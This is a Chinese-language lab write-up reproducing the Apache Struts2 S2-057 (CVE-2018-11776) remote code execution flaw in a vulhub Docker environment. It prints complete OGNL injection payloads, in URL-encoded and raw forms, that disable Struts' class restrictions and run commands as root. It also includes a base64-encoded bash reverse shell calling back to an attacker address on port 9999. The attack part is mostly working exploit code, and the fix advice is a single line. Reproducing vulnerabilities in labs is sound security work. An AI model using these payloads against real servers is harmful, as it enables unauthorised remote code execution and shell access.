CVE-2018-11776 S2-057 远程代码执行漏洞
漏洞 远程 2018 CVE 代码执行 S2
2023-06-13 09:15:43 时间
1 漏洞信息
漏洞名称 | 远程代码执行漏洞 |
---|---|
漏洞编号 | CVE-2018-11776 |
危害等级 | 高危 |
CVSS评分 | 8.5 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | Apache |
漏洞组件 | Struts2 |
受影响版本 | Struts2 <= 2.3.34,Struts2 = 2.5.16 |
漏洞概述 | 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。 |
2 环境搭建
2.1 环境概述
- Linux操作系统
2.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-057
docker-compose up -d
访问
3 漏洞复现
根据vulhub官网的poc,查看是否存在该漏洞。发现成功执行了333*3的语句,说明存在该漏洞。
http://192.168.146.158:8057/struts2-showcase/$%7B333*3%7D/actionChain1.action
访问漏洞url并且添加恶意payload进行抓包。
/struts2-showcase/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
payload原型:
/struts2-showcase/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}/actionChain1.action
发现成功执行了id命令,发现是root权限。
修改payload,执行反弹shell命令。
首先要监听端口,ip是攻击ip,不是漏洞靶机ip。这里没有再开另外一台机器,因此用和靶机同一台的ip进行接收所反弹的shell。
对要生成的反弹shell命令进行base编码,然后还要进行url编码
这里的ip地址也是攻击机的ip地址
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D
最终的反弹shell payload如下
/struts2-showcase/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
payload原型:
/struts2-showcase/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}/actionChain1.action
反弹成功
4 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
相关文章
- Apache Solr远程代码执行(CVE-2019-0193)漏洞复现
- Apache Log4j2远程代码执行漏洞
- 【安全漏洞】OpenSSL远程代码执行漏洞
- Struts2 漏洞信息汇总
- Weblogic WLS组件IIOP协议远程代码执行漏洞 (CVE-2020-2551)
- Spring Cloud Gateway远程代码执行漏洞风险
- K8S 生态周报| Kubernetes 修复了转义漏洞,可以放心的查看资源了
- CVE-2017-9805 S2-052远程代码执行漏洞
- CVE-2017-10271 Weblogic远程代码执行漏洞
- 谷歌浏览器出现已被黑客利用的零日漏洞 请所有用户立即升级最新版
- 漏洞警惕Redis未授权漏洞威胁(redis未授权)
- 存在多年的 Linux 漏洞被发现:可通过 WiFi 攻击目标计算机
- Android NFC 漏洞可被黑客拿来传播植入恶意软件
- 过去五年的英特尔芯片都包含无法修复的漏洞
- 硬核观察 | 全球 60% 的电子邮件服务器受到已存在了 17 年的远程漏洞影响
- 某远程代码执行漏洞影响超过70个不同的CCTV-DVR供应商的漏洞分析
- Discuz!X前台任意文件删除漏洞重现及分析
- 谷歌又双叒叕曝光Windows的0day漏洞,微软很不开心
- 漏洞预警:基于RedHat发行的Apache Tomcat本地提权漏洞
- Linux后门入侵检测工具,附bash漏洞最终解决方法